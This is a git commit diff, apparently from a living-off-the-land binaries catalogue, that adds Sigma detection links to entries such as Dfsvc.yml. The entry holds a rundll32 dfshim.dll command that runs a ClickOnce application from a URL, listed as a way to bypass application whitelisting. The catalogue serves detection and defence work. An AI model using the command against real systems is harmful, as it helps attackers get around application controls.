Detection Resources and Other Updates (#179)

* Add detection links for scripts * Add detection links for OtherMSBins. Fixed and updated as needed. * Add detection links for MSBins. Fixed and updated as needed. * Add detection links for oslibraries * Updating template for Detections * Removing empty Detection:Sigma entries * Remove redundant blank line * Replacing commit URL with file URL Co-authored-by: root <root@DESKTOP-5CR935D.localdomain> Co-authored-by: Wietze <wietze@users.noreply.github.com>
2025-07-27 04:32:24 +02:00 · 2021-11-15 08:19:03 -05:00
parent 2031916b1a
commit 23dd0236ae
145 changed files with 558 additions and 181 deletions
--- a/yml/OSBinaries/Dfsvc.yml
+++ b/yml/OSBinaries/Dfsvc.yml
@@ -5,7 +5,7 @@ Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
  - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
-    Description: Executes click-once-application from Url
+    Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
    Usecase: Use binary to bypass Application whitelisting
    Category: AWL bypass
    Privileges: User
@@ -19,7 +19,7 @@ Full_Path:
 Code_Sample:
 - Code:
 Detection:
- - IOC:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
 Resources:
  - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
  - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe